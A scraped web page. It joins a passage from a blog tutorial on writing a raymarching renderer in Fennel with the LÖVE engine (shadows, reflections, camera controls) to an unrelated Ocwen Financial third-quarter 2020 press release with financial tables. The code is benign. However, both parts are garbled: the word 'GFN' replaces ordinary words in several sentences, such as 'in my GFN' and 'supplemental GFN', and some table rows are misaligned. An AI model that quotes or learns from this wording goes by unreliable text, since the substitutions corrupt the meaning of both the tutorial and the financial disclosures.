Unfortunately the only object we have at this moment is a sphere, so there’s no way of showing this trick on it, as its surface isn’t very complex.

All this may seem expensive, and it actually is.
Unfortunately Lua doesn’t have real multithreading to speed this up, and threads feature, provided by LÖVE results in even worse performance than computing everything in single thread.
Well at leas the way I’ve tried it.
There’s a shader DSL in LÖVE, which could be used to compute this stuff on GPU, but this is currently out of the scope of this project, as I wanted to implement this in Fennel.

Speaking of shaders, now, that we can draw pixels on screen, we also can shade those, and compute lighting and reflections!

Lighting and reflections

Before we begin implementing lighting, let’s add two more objects – a ground plane, and arbitrary box.
Much like sphere object, we first define signed distance function, and then the constructor for the object:

(local abs math.abs)

(fn box-distance [{:pos [box-x box-y box-z]
                   :dimensions [x-side y-side z-side]}
                  [x y z]]
  (sqrt (+ (^ (max 0 (- (abs (- box-x x)) (/ x-side 2))) 2)
           (^ (max 0 (- (abs (- box-y y)) (/ y-side 2))) 2)
           (^ (max 0 (- (abs (- box-z z)) (/ z-side 2))) 2))))

(fn box [sides pos color]
  (let [[x y z] (or pos [0 0 0])
        [x-side y-side z-side] (or sides [10 10 10])
        [r g b] (or color [1 1 1])]
    {:dimensions [(or x-side 10)
                  (or y-side 10)
                  (or z-side 10)]
     :pos [(or x 0) (or y 0) (or z 0)]
     :color [(or r 0) (or g 0) (or b 0)]
     :sdf box-distance}))

(fn ground-plane [z color]
  (let [[r g b] (or color [1 1 1])]
    {:z (or z 0)
     :color [(or r 0) (or g 0) (or b 0)]
     :sdf (fn [plane [_ _ z]] (- z plane.z))}))

In case of ground-plane we incorporate :sdf as a anonymous function, because it is a simple one-liner.

Now, as we have more objects, let’s add those to the scene and see if those work:

(var camera {:pos [20.0 50.0 0.0]
             :x-rotate 0.0
             :z-rotate 0.0})

(local scene [(sphere nil [-6 0 0] [1 0 0])
              (box nil [6 0 0] [0 1 0])
              (ground-plane -10 [0 0 1])])

With this scene and camera we should see this:

It’s a bit sadistic on the eyes, but we can at least be sure that everything works correctly.
Now we can implement lighting.

In order to calculate lighting we’ll need to know a normal to the surface at point.
Let’s create get-normal function, that receives the point, and our scene:

(fn get-normal [[px py pz] scene]
  (let [x MARCH-DELTA
        (d) (distance-estimator [px py pz] scene)
        (dx) (distance-estimator [(- px x) py pz] scene)
        (dy) (distance-estimator [px (- py x) pz] scene)
        (dz) (distance-estimator [px py (- pz x)] scene)]
    (norm [(- d dx) (- d dy) (- d dz)])))

It is a nice trick, since we create three more points around our original point, use existing distance estimation function, and get a normalized vector of subtraction of each axis from original point, with the distance to the new point.
Let’s use this function to get normal for each point, and use normal as our color:

;; rest of love.draw
(if (< distance DRAW-DISTANCE)
    (love-set-color (get-normal (move-point ro rd distance) scene))
    (love-set-color 0 0 0))
;; rest of love.draw

Notice that in order to get endpoint of our ray we move-point ro along the direction rd using the computed distance.
We then pass the resulting point into get-normal, and our scene, thus computing the normal vector, which we then pass to love-set-color, and it gives us this result:

You can see that the ground-plane remained blue, and this isn’t error. Blue in our case is [0 0 1], and since in our world, positive z coordinates indicate up, we can see it directly in resulting color of the plane.
The top of the cube and the sphere are also blue, and front side is green, which means that our normals are correct.

Now we can compute basic lighting.
For that we’ll need a light object:

Let’s create a shade-point function, that will accept a point, point color, light position, and a scene:

(fn shade-point [point color light scene]
  (vec-mul color (vec3 (point-lightness point scene light))))

It may seem that this function’s only purpose is to call point-lightness, which we will define a bit later, and return a new color.
And this is true, at least for now.
Let’s create point-lightness function:

(fn clamp [a l t]
  (if (< a l) l
      (> a t) t
      a))

(fn above-surface-point [point normal]
  (vec-add point (vec-mul normal (vec3 (* MARCH-DELTA 2)))))

(fn point-lightness [point scene light]
  (let [normal (get-normal point scene) ➊
        light-vec (norm (vec-sub light point))
        (distance) (march-ray (above-surface-point point normal) ➋
                              light-vec
                              scene)
        lightness (clamp (dot light-vec normal) 0 1)] ➌
    (if (< distance DRAW-DISTANCE)
        (* lightness 0.5)
        lightness)))

What this function does, is simple.
We compute the normal ➊ for given point, then we find a point that is just above the surface, using above-surface-point function ➋.
And we use this point as our new ray origin to march towards the light.
We then get the distance from the march-ray function, and check if we’ve went all the way to the max distance or not.
If not, this means that there was a hit, and we divide total lightness by 2 thus creating a shadow.
In the other case we return lightness as is.
And lightness is a dot product between light-vec and normal to the surface ➌, where light-vec is a normalized vector from the point to the light.

If we again modify our love.draw function like this:

;; rest of love.draw
(if (< distance DRAW-DISTANCE)
    (let [point (move-point ro rd distance)]
      (love-set-color (shade-point point color scene light)))
    (love-set-color 0 0 0))
;; rest of love.draw

We should see the shadows:

This already looks like real 3D, and it is.
But we can do a bit more, so let’s add reflections.

Let’s create a reflection-color function:

(var reflection-count 3)

(fn reflection-color [color point direction scene light]
  (var [color p d i n] [color point direction 0 (get-normal point scene)]) ➊
  (var not-done? true)
  (while (and (< i reflection-count) not-done?)
    (let [r (vec-sub d (vec-mul (vec-mul (vec3 (dot d n)) n) [2 2 2])) ➋
          (distance new-color) (march-ray (above-surface-point p n) r scene)] ➌
      (if (< distance DRAW-DISTANCE)
          (do (set p (move-point p r distance))
              (set n (get-normal p scene))
              (set d r) ➍
              (let [[r0 g0 b0] color
                    [r1 g1 b1] new-color
                    l (/ (point-lightness p scene light) 2)]
                (set color [(* (+ r0 (* r1 l)) 0.66)
                            (* (+ g0 (* g1 l)) 0.66)
                            (* (+ b0 (* b1 l)) 0.66)]) ➎))
          (set not-done? false) ➏))
    (set i (+ i 1)) ➐)
  color)

This is quite big function, so let’s look at it piece by piece.

First, we use destructuring to define several vars ➊, that we will be able to change using set later in the function.
Next we go into while loop, which checks both for maximum reflections reached, and if we the ray went to infinity.
First thing we do in the loop, is computing the reflection vector r ➋, by using this formula:

This is our new direction, which we will march from new above-surface-point ➌.
If we’ve hit something, and our distance will be less than DRAW-DISTANCE, we’ll set our point p to new point, compute new normal n, and set direction d to previous direction, which was reflection vector r ➍.
Next we compute the resulting color.
I’m doing a simple color addition here, which is not entirely correct way of doing it, but for now I’m fine with that.
We also compute lightness of the reflection point, and divide it by 2, so our reflections appear slightly darker.
Then we add each channel and make sure it is not greater than 1, by multiplying it by 0.66 ➎.
The trick here, is that maximum lightness we can get is 0.5, so if we add two values, one of which is multiplied by 0.5 overall result can be averaged by multiplying by 0.66.
This way we not loosing brightness all the way, and reflection color blends with original color nicely.

In case if we don’t hit anything, it means that this is final reflection, therefore we can end ➏ the while loop on this iteration.
Lastly, since I’ve already ranted on the absence of break in Fennel, we have to increase loop counter manually ➐ at the end of the loop.

Let’s change shade-point so it will pass color into this function:

(fn shade-point [point color direction scene light]
  (-> color
      (vec-mul (vec3 (point-lightness point scene light)))
      (reflection-color point direction scene light)))

You can notice that I’ve added direction parameter, as we need it for computing reflections, so we also have to change the call to shade-point in love.draw function:

;; rest of love.draw
(if (< distance DRAW-DISTANCE)
    (let [point (move-point ro rd distance)]
      (love-set-color (shade-point point color rd scene light))) ;; rd is our initial direction
    (love-set-color 0 0 0))
;; rest of love.draw

Let’s try this out (I’ve brought ground-plane a bit closer to objects so we could better see reflections):

We can see reflections, and reflections of reflections in reflections, because previously we’ve set reflection-count to 3.
Currently our reflections are pure mirrors, as we reflect everything at a perfect angle, and shapes appear just as real objects.
This can be changed by introducing materials, that have different qualities like roughness, and by using a better reflection algorithms like Phong shading, but maybe next time.
Refractions also kinda need materials, as refraction angle can be different, depending on what kind of material it goes through.
E.g. glass and still pool of water should have different refraction angle.
And some surfaces should reflect rays at certain angles, and let them go through at other angles, which will also require certain modifications in reflection algorithm.

Now, if we would set our camera, lookat, and light to:

(local lookat [19.75 49 19.74])

(var camera {:pos [20 50 20]
             :x-rotate 0
             :z-rotate 0})

(local scene [(box [5 5 5] [-2.7 -2 2.5] [0.79 0.69 0.59])
              (box [5 5 5] [2.7 2 2.5] [0.75 0.08 0.66])
              (box [5 5 5] [0 0 7.5] [0.33 0.73 0.42])
              (sphere 2.5 [-2.7 2.5 2.5] [0.56 0.11 0.05])
              (sphere 10 [6 -20 10] [0.97 0.71 0.17])
              (ground-plane 0 [0.97 0.27 0.35])])

We would see an image from the beginning of this post:

For now, I’m pretty happy with current result, so lastly let’s make it possible to move in our 3D space.

User input

We’ll be doing two different ways of moving in our scene – with keyboard and gamepad.
The difference mostly is in the fact, that gamepad can give us floating point values, so we can move slower or faster depending on how we move the analogs.

We’ve already specified needed functions from LÖVE as our locals, but to recap, we’ll need only two:

(local love-key-pressed? love.keyboard.isDown)
(local love-get-joysticks love.joystick.getJoysticks)

But first, we’ll need to make changes to our camera, as currently it can only look at the origin.

How will we compute the look at point for our camera so we will be able to move it around in a meaningful way?
I’ve decided that a good way will be to “move” camera forward a certain amount, and then rotate this point around camera by using some angles.
Luckily for us, we’ve already specified that our camera has two angles :x-rotate, and z-rotate:

(var camera {:pos [20 50 20]
             :x-rotate 255
             :z-rotate 15})

And it is also declared as a var, which means that we can set new values into it.
Let’s write a function that will compute a new lookat point for current camera position and rotation:

(local cos math.cos)
(local sin math.sin)

(fn rotate-point [[x y z] [ax ay az] x-angle z-angle]
  (let [x (- x ax)
        y (- y ay)
        z (- z az)
        x-angle (* x-angle RAD)
        z-angle (* z-angle RAD)
        cos-x (cos x-angle)
        sin-x (sin x-angle)
        cos-z (cos z-angle)
        sin-z (sin z-angle)]
    [(+ (* cos-x cos-z x) (* (- sin-x) y) (* cos-x sin-z z) ax)
     (+ (* sin-x cos-z x) (* cos-x y) (- (* sin-x sin-z z)) ay)
     (+ (* (- sin-z) x) (* cos-z z) az)]))

(fn forward-vec [camera]
  (let [pos camera.pos]
    (rotate-point (vec-add pos [1 0 0]) pos camera.x-rotate camera.z-rotate)))

First function rotate-point will rotate one point around another point by using two degrees.
It is based on aircraft principal axes, but we only have two axes, so we do not need to “roll”, hence we do little less computations here.

Next is the forward-vec function, that computes current “forward” vector for camera.
Forward in this case means the direction camera is “facing”, which is based on two angles we specify in the camera.

With this function we can implement basic movement and rotation functions for camera:

(fn camera-forward [n]
  (let [dir (norm (vec-sub (forward-vec camera) camera.pos))]
    (set camera.pos (move-point camera.pos dir n))))

(fn camera-elevate [n]
  (set camera.pos (vec-add camera.pos [0 0 n])))

(fn camera-rotate-x [x]
  (set camera.x-rotate (% (- camera.x-rotate x) 360)))

(fn camera-rotate-z [z]
  (set camera.z-rotate (clamp (+ camera.z-rotate z) -89.9 89.9)))

(fn camera-strafe [x]
  (let [z-rotate camera.z-rotate]
    (set camera.z-rotate 0)
    (camera-rotate-x 90)
    (camera-forward x)
    (camera-rotate-x -90)
    (set camera.z-rotate z-rotate)))

And if we modify our love.draw again, we’ll be able to use our computed lookat point as follows:

(fn love.draw []
  (let [;; rest of love.draw
        lookat (forward-vec camera)
        ;; rest of love.draw

Now we don’t need a global lookat variable, and it is actually enough for us to compute new lookat every frame.

As for movement, let’s implement a simple keyboard handler:

(fn handle-keyboard-input []
  (if (love-key-pressed? "w") (camera-forward 1)
      (love-key-pressed? "s") (camera-forward -1))
  (if (love-key-pressed? "d")
      (if (love-key-pressed? "lshift")
          (camera-strafe 1)
          (camera-rotate-x 1))
      (love-key-pressed? "a")
      (if (love-key-pressed? "lshift")
          (camera-strafe -1)
          (camera-rotate-x -1)))
  (if (love-key-pressed? "q") (camera-rotate-z 1)
      (love-key-pressed? "e") (camera-rotate-z -1))
  (if (love-key-pressed? "r") (camera-elevate 1)
      (love-key-pressed? "f") (camera-elevate -1)))

Similarly we can implement a controller support:

(fn handle-controller []
  (when gamepad
    (let [lstick-x  (gamepad:getGamepadAxis "leftx")
          lstick-y  (gamepad:getGamepadAxis "lefty")
          l2        (gamepad:getGamepadAxis "triggerleft")
          rstick-x  (gamepad:getGamepadAxis "rightx")
          rstick-y  (gamepad:getGamepadAxis "righty")
          r2        (gamepad:getGamepadAxis "triggerright")]
      (when (and lstick-y (or (< lstick-y -0.2) (> lstick-y 0.2)))
        (camera-forward (* 2 (- lstick-y))))
      (when (and lstick-x (or (< lstick-x -0.2) (> lstick-x 0.2)))
        (camera-strafe (* 2 lstick-x)))
      (when (and rstick-x (or (< rstick-x -0.2) (> rstick-x 0.2)))
        (camera-rotate-x (* 4 rstick-x)))
      (when (and rstick-y (or (< rstick-y -0.2) (> rstick-y 0.2)))
        (camera-rotate-z (* 4 rstick-y)))
      (when (and r2 (> r2 -0.8))
        (camera-elevate (+ 1 r2)))
      (when (and l2 (> l2 -0.8))
        (camera-elevate (- (+ 1 l2)))))))

Only for controller we make sure that our l2 and r2 axes are from 0 to 2, since by default these axes are from -1 to 1, which isn’t going to work for us.
Similarly to this we can add ability to change field of view, or reflection count, but I’ll leave this out for those who interested in trying it themselves.
It’s not hard.

As a final piece, we need to detect if controller was inserted, and handle keys somewhere.
So let’s add these two final functions that we need for everything to work:

(var gamepad nil)

(fn love.joystickadded [g]
  (set gamepad g))

(fn love.update [dt]
  (handle-keyboard-input)
  (handle-controller))

love.joystickadded will take care of watching for new controllers, and love.update will ask for new input every now and then.

By this moment we should have a working raymarching 3D renderer with basic lighting and reflections!

Final thoughts

I’ve decided to write this post because I was interested in three topics:

  • Fennel, a Lisp like language, which is a lot like Clojure syntax-wise, and has great interop with Lua (because it IS Lua)
  • LÖVE, a nice game engine I’ve been watching for a long time already, and played some games written with it, which were quite awesome,
  • and Lua itself, a nice, fast scripting language, with cool idea that everything is a table.

Although I didn’t use much of Lua here, I’ve actually tinkered with it a lot during whole process, testing different things, reading Fennel’s compiler output, and benchmarking various constructs, like field access, or unpacking numeric tables versus multiple return values.
Lua has some really cool semantics of defining modules as tables, and incorporating special meaning to tables via setmetatable, which is really easy to understand in my GFN.

Fennel is a great choice if you don’t want to learn Lua syntax (which is small, but, you know, it exists).
For me, Fennel is a great language, because I don’t have to deal with Lua syntax AND because I can write macros.
And even though I didn’t wrote any macro for this project, because everything is already presented in Fennel itself, the possibility of doing this worth something.
Also, during benchmarking various features, I’ve used self-written time macro:

(macro time [body]
  `(let [clock# os.clock
         start# (clock#)
         res# ,body
         end# (clock#)]
     (print (.. "Elapsed: " (* 1000 (- end# start#)) " ms"))
     res#))

So ability to define such things is a good thing.

LÖVE is a great engine, and although I’ve used a very little bit of it, I still think that this is a really cool project, because there is so much more in it.
Maybe some day I’ll make a game that will realize LÖVE’s full potential.

On a downside note…
The resulting raymarching is very slow.
I’ve managed to get around 25 FPS for a single object in the scene, and a 256 by 224 pixel resolution.
Yes, this is because it runs in a single thread, and does a lot of expensive computations.
Lua itself isn’t a very fast language, and even though LÖVE uses Luajit – a just in time compiler that emits machine code, it’s still not fast enough for certain operations, or techniques.
For example, if we implement operator overloading for or vectors we’ll loose a lot of performance for constant table lookups.
This is an existing problem in Lua, since it does it’s best of being small and embeddable, so it could work nearly on anything, therefore it doesn’t do a lot of caching and optimizations.

But hey, this is a raymarching in ~350 lines of code with some cool tricks like destructuring!
I’m fine with results.
A slightly more polished version of the code from this article is available at this repository, so if anything doesn’t work in the code above, or you got lost and just want to play with final result, you know where to go 🙂

Till next time, and thanks for reading!

Continue Reading

Business

Ocwen Financial Provides Business Update and Preliminary Third Quarter Results

becker blake

Published

on

 

Continued profitability improvement and originations volume growth

Strong operating and financial momentum

Settlement with Florida completes resolution of all state actions from 2017

WEST PALM BEACH, Fla., Oct. 20, 2020 (GLOBE NEWSWIRE) — Ocwen Financial Corporation (NYSE: OCN) (“Ocwen” or the “Company”), a leading non-bank mortgage servicer and originator, today provided preliminary information regarding its third quarter 2020 results and progress on the Company’s key business priorities. A presentation with additional detail regarding today’s announcement is available on the Ocwen Financial Corporation website at www.ocwen.com (through a link on the Shareholder Relations page).

The Company reported a net loss of $9.4 million and a pre-tax loss of $11.4 million for the three months ended September 30, 2020, compared to a net loss of $42.8 million and a pre-tax loss of $38.3 million for the three months ended September 30, 2019. Adjusted pre-tax income was $13.5 million for the quarter compared to a $42.0 million adjusted pre-tax loss excluding NRZ lump-sum amortization in the prior year period (see “Note Regarding Non-GAAP Financial Measures” below).

Glen A. Messina, President and CEO of Ocwen, said, “Our performance across the business is progressing consistent with our expectations. The execution of our strategy to drive balance, diversification, cost leadership and operational excellence is delivering improved profitability, originations growth across all channels, and continued strong operating performance in our servicing business. Our total liquidity position has improved from last quarter and we are making good progress on our plans to implement an MSR asset vehicle to support our continued growth and diversification efforts.”

Mr. Messina continued, “I believe the Ocwen of today is stronger, more efficient, more diversified, and well positioned to capitalize on current and emerging growth opportunities. I am very proud of our global team for their continued commitment to our mission of creating positive outcomes for homeowners, communities and investors.”

The Company reported the following preliminary results for the third quarter 2020 (see “Note Regarding Non-GAAP Financial Measures” and “Note Regarding Financial Performance Estimates” below):

  • Pre-tax loss was $11.4 million compared to pre-tax loss of $38.3 million for the third quarter 2019. Adjusted pre-tax income was $13.5 million; fourth consecutive quarter of positive adjusted pre-tax income.
  • Annualized pre-tax loss improved by $208 million compared to the combined annualized pre-tax loss of Ocwen and PHH Corporation for the second quarter 2018; annualized adjusted pre-tax earnings run rate excluding amortization of NRZ lump-sum payments improved by more than $376 million compared to the combined annualized adjusted pre-tax earnings run rate of Ocwen and PHH Corporation for the second quarter 2018.
  • Notable items for the quarter include, among others, $13.8 million of re-engineering and COVID-19 related expenses, $5.8 million for legal and regulatory reserves and $4.4 million of MSR valuation adjustments.
  • Resolved legacy regulatory matter with the State of Florida Office of the Attorney General and Office of Financial Regulation on October 15, 2020. The Company has now resolved all state actions from 2017.
  • Approximately $6.7 billion of servicing UPB originated through forward and reverse lending channels, up 67% from prior quarter; average daily lock volume of approximately $145 million in October to date.
  • Added approximately $4.7 billion of interim subservicing UPB from existing subservicing clients and $15 billion of opportunities in late-stage discussions. Strong pipeline with top 10 prospects representing approximately $125 billion in combined subservicing, flow and recapture services opportunities.
  • Approximately $413 million of unrestricted cash and available credit at September 30, 2020, up from $314 million at June 30, 2020; previously identified balance sheet optimization actions on track.
  • Continued progress on the implementation of MSR asset vehicle (“MAV”) and the Company is in advanced discussions with potential investors. MAV is expected to provide funding for up to $55 billion in synthetic subservicing and enable portfolio retention services.
  • Approximately 75,000 forbearance plans outstanding as of October 9, 2020, down from a peak of approximately 131,000 forbearance plans outstanding at the end of the second quarter. Servicer advance levels are approximately 27% below base case servicer advance levels as of September 30, 2020.

Webcast and Conference Call

Ocwen will hold a conference call on Tuesday, October 20, 2020 at 8:30 a.m. (ET) to review the Company’s preliminary third quarter 2020 operating results. A live audio webcast and slide presentation for the call will be available at www.ocwen.com (through a link on the Shareholder Relations page). A replay of the conference call will be available via the website approximately two hours after the conclusion of the call and will remain available for approximately 30 days. The Company expects to release final third quarter 2020 results in early November.

About Ocwen Financial Corporation

Ocwen Financial Corporation (NYSE: OCN) is a leading non-bank mortgage servicer and originator providing solutions through its primary brands, PHH Mortgage and Liberty Reverse Mortgage. PHH Mortgage is one of the largest servicers in the country, focused on delivering a variety of servicing and lending programs. Liberty is one of the nation’s largest reverse mortgage lenders dedicated to education and providing loans that help customers meet their personal and financial needs. We are headquartered in West Palm Beach, Florida, with offices in the United States and the U.S. Virgin Islands and operations in India and the Philippines, and have been serving our customers since 1988. For additional information, please visit our website (www.ocwen.com).

Forward-Looking Statements

This press release contains forward-looking statements within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934, as amended. These forward-looking statements may be identified by a reference to a future period or by the use of forward-looking terminology. Forward-looking statements are typically identified by words such as “expect”, “believe”, “foresee”, “anticipate”, “intend”, “estimate”, “goal”, “strategy”, “plan” “target” and “project” or conditional verbs such as “will”, “may”, “should”, “could” or “would” or the negative of these terms, although not all forward-looking statements contain these words. Forward-looking statements by their nature address matters that are, to different degrees, uncertain. Our business has been undergoing substantial change and we are in the midst of a period of significant capital markets volatility and experiencing significant changes within the mortgage lending and servicing ecosystem which has magnified such uncertainties. Readers should bear these factors in mind when considering such statements and should not place undue reliance on such statements.

Forward-looking statements involve a number of assumptions, risks and uncertainties that could cause actual results to differ materially. In the past, actual results have differed from those suggested by forward looking statements and this may happen again. Important factors that could cause actual results to differ materially from those suggested by the forward-looking statements include, but are not limited to, uncertainty relating to the continuing impacts of the COVID-19 pandemic, including the response of the U.S. government, state governments, the Federal National Mortgage Association (Fannie Mae) and Federal Home Loan Mortgage Corporation (Freddie Mac) (together, the GSEs), the Government National Mortgage Association (Ginnie Mae) and regulators, as well as the potential for ongoing disruption in the financial markets and in commercial activity generally, increased unemployment, and other financial difficulties facing our borrowers; the proportion of borrowers who enter into forbearance plans, the financial ability of borrowers to resume repayment and their timing for doing so; the adequacy of our financial resources, including our sources of liquidity and ability to sell, fund and recover servicing advances, forward and reverse whole loans, and HECM and forward loan buyouts and put backs, as well as repay, renew and extend borrowings, borrow additional amounts as and when required, meet our MSR or other asset investment objectives and comply with our debt agreements, including the financial and other covenants contained in them; increased servicing costs based on increased borrower delinquency levels or other factors; our ability to consummate a transaction with investors to implement our planned mortgage asset vehicle, the timeline for making such a vehicle operational, including obtaining required regulatory approvals, and the extent to which such a vehicle will accomplish our objectives; the future of our long-term relationship and remaining servicing agreements with NRZ; our ability to timely adjust our cost structure and operations following the completion of the loan transfer process in response to the previously disclosed termination by NRZ of the PMC subservicing agreement; our ability to continue to improve our financial performance through cost re-engineering efforts and other actions; our ability to continue to grow our lending business and increase our lending volumes in a competitive market and uncertain interest rate environment; our ability to execute on identified business development and sales opportunities; uncertainty related to past, present or future claims, litigation, cease and desist orders and investigations regarding our servicing, foreclosure, modification, origination and other practices brought by government agencies and private parties, including state regulators, the Consumer Financial Protection Bureau (CFPB), State Attorneys General, the Securities and Exchange Commission (SEC), the Department of Justice or the Department of Housing and Urban Development (HUD); adverse effects on our business as a result of regulatory investigations, litigation, cease and desist orders or settlements and the reactions of key counterparties, including lenders, the GSEs and Ginnie Mae; our ability to comply with the terms of our settlements with regulatory agencies and the costs of doing so; increased regulatory scrutiny and media attention; any adverse developments in existing legal proceedings or the initiation of new legal proceedings; our ability to effectively manage our regulatory and contractual compliance obligations; our ability to interpret correctly and comply with liquidity, net worth and other financial and other requirements of regulators, the GSEs and Ginnie Mae, as well as those set forth in our debt and other agreements; our ability to comply with our servicing agreements, including our ability to comply with the requirements of the GSEs and Ginnie Mae and maintain our seller/servicer and other statuses with them; our ability to fund future draws on existing loans in our reverse mortgage portfolio; our servicer and credit ratings as well as other actions from various rating agencies, including any future downgrades; as well as other risks and uncertainties detailed in Ocwen’s reports and filings with the SEC, including its annual report on Form 10-K for the year ended December 31, 2019 and its current and quarterly reports since such date. Anyone wishing to understand Ocwen’s business should review its SEC filings. Our forward-looking statements speak only as of the date they are made and, we disclaim any obligation to update or revise forward-looking statements whether as a result of new information, future events or otherwise.

Note Regarding Non-GAAP Financial Measures

This press release contains references to non-GAAP financial measures, such as our references to adjusted pre-tax income (loss) and adjusted pre-tax income (loss) excluding amortization of NRZ lump-sum payments.

We believe these non-GAAP financial measures provide a useful supplement to discussions and GFN of our financial condition. In addition, management believes that these presentations may assist investors with understanding and evaluating our cost re-engineering efforts and other initiatives to drive improved financial performance. However, these measures should not be analyzed in isolation or as a substitute to GFN of our GAAP expenses and pre-tax income (loss). There are certain limitations to the analytical usefulness of the adjustments we make to GAAP expenses and pre-tax income (loss) and, accordingly, we rely primarily on our GAAP results and use these adjustments only for purposes of supplemental GFN. Non-GAAP financial measures should be viewed in addition to, and not as an alternative for, Ocwen’s reported results under accounting principles generally accepted in the United States. Other companies may use non-GAAP financial measures with the same or similar titles that are calculated differently to our non-GAAP financial measures. As a result, comparability may be limited. Readers are cautioned not to place undue reliance on GFN of the adjustments we make to GAAP expenses and pre-tax income (loss).

Beginning with the three months ended June 30, 2020, we refined our definitions of Expense Notables, which we previously referred to as “Expenses Excluding MSR Valuation Adjustments, net, and Expense Notables,” and Income Statement Notables in order to be more descriptive of the types of items included.

Expense Notables

In the table titled “Expense Notables”, we adjust GAAP operating expenses for the following factors (1) expenses related to severance, retention and other actions associated with continuous cost and productivity improvement efforts, (2) significant legal and regulatory settlement expense itemsa, (3) NRZ consent process expenses related to the transfer of legal title in MSRs to NRZ, (4) PHH acquisition and integration planning expenses, and (5) certain other significant activities including, but not limited to, insurance related expense and settlement recoveries, compensation or incentive compensation expense reversals and non-routine transactions (collectively, Other) consistent with the intent of providing management and investors with a supplemental means of evaluating our expenses.

($ in millions) Q2’18 Q3’19 Q3’20(c)
OCN PHH OCN + PHH OCN + PHH (Annualized) OCN OCN (Annualized) OCN OCN (Annualized)
I Expenses (as reported) (a) 206 71 277 1,107 45 179
II Reclassifications (b) 1 1 5
III Deduction of MSR valuation adjustments, net (33 ) (33 ) (132 ) 135 538
IV Operating Expenses (I+II+III) 173 72 245 979 179 717 150 598
Adjustments for Notables
Re-engineering costs (5 ) (3 ) (8 ) (32 ) (18 ) (7 )
Significant legal and regulatory settlement expenses (7 ) (3 ) (11 ) (42 ) (4 ) (6 )
NRZ consent process expenses (1 ) (1 ) (2 ) (0 ) 0
PHH acquisition and integration planning expenses (2 ) (2 ) (8 )
Expense recoveries 6 6 23 2
COVID-19 Related Expenses (6 )
Other 1 (1 ) (1 ) 3 (0 )
V Expense Notables (9 ) (7 ) (16 ) (63 ) (17 ) (19 )
VI Adjusted Expenses (IV+V) 164 65 229 916 162 648 130 522

(a) Q2’18 expenses as per OCN Form 10-Q of $206 filed on July 26, 2018 and PHH Form 10-Q of $71 filed August 3, 2018, annualized to equal $1,107 on a combined basis

(b) Reclassifications made to PHH reported expenses to conform to Ocwen presentation

(c) OCN changed the presentation of expenses in Q4’ 19 to separately report MSR valuation adjustments, net from operating expenses

Income Statement Notables

In the table titled “Income Statement Notables”, we adjust GAAP pre-tax loss for the following factors (1) Expense Notables, (2) changes in fair value of our Agency and Non-Agency MSRs due to changes in interest rates, valuation inputs and other assumptions, net of hedge positions, (3) offsets to changes in fair value of our MSRs in our NRZ financing liability due to changes in interest rates, valuation inputs and other assumptions, (4) changes in fair value of our reverse originations portfolio due to changes in interest rates, valuation inputs and other assumptions, (5) certain other transactions, including but not limited to pension benefit cost adjustments and gains related to exercising servicer call rights and fair value assumption changes on other investments (collectively, Other) and (6) amortization of NRZ lump-sum cash payments consistent with the intent of providing management and investors with a supplemental means of evaluating our net income/(loss).

($ in millions) Q2’18 Q3’19 Q3’20
OCN PHH OCN + PHH OCN + PHH (Annualized) OCN OCN (Annualized) OCN OCN (Annualized)
I Reported Pre-Tax Income / (Loss)(a) (28 ) (35 ) (63 ) (253 ) (38 ) (153 ) (11 ) (25 )
Adjustment for Notables
Expense Notables (from prior table) 9 7 16 17 19
Non-Agency MSR FV Change(b) (5 ) (5 ) (252 ) (14 )
Agency MSR FV Change, net of macro hedge(b) 63 4
NRZ MSR Liability FV Change (Interest Expense) 9 9 198 10
Reverse FV Change 4 4 (3 ) 4
Debt Repurchase Gain (5 )
Other (6 ) (6 ) 2 1
II Total Income Statement Notables 11 7 18 72 21 83 25
III Adjusted Pre-tax Income (Loss) (I+II) (17 ) (28 ) (45 ) (181 ) (18 ) (70 ) 14 54
IV Amortization of NRZ Lump-sum Cash Payments (35 ) (35 ) (141 ) (42 ) (98 )
V Adjusted Pre-tax Income (Loss) excluding Amortization of NRZ Lump-sum (III+IV)(c) (53 ) (28 ) (81 ) (322 ) (42 ) (168 ) 14 54

(a) Q2’18 pre-tax loss as per respective Forms 10-Q filed on July 26, 2018 and August 3, 2018, respectively, annualized to equal $(253) million on a combined basis

(b) Represents FV changes that are driven by changes in interest rates, valuation inputs or other assumptions, net of unrealized gains / (losses) on macro hedge. Non-Agency = Total MSR excluding GNMA & GSE MSRs. Agency = GNMA & GSE MSRs. The adjustment does not include $12 million valuation gains of certain MSRs that were opportunistically purchased in disorderly transactions due to the market environment in Q2 2020 (nil in Q2 2018).

(c) Represents OCN and PHH combined adjusted pre-tax income (loss) excluding amortization of NRZ lump-sum cash payments, annualized to equal $(322) million on a combined basis in Q2’18

Note Regarding Financial Performance Estimates

This press release contains statements relating to our preliminary third quarter financial performance and our current assessments of the impact of the COVID-19 pandemic. These statements are based on currently available information and reflect our current estimates and assessments, including about matters that are beyond our control. We are operating in a fluid and evolving environment and actual outcomes may differ materially from our current estimates and assessments. The Company has not finished its third quarter financial closing procedures. There can be no assurance that actual results will not differ from our current estimates and assessments, including as a result of third quarter financial closing procedures, and any such differences could be material.

FOR FURTHER INFORMATION CONTACT:


a Including however not limited to CFPB, Florida Attorney General/Florida Office of Financial Regulations and Massachusetts Attorney General litigation related legal expenses, state regulatory action related legal expenses and state regulatory action settlement related escrow GFN costs (collectively, CFPB and state regulatory defense and escrow GFN expenses)

Continue Reading

US Election

US Election Remaining

Advertisement

Trending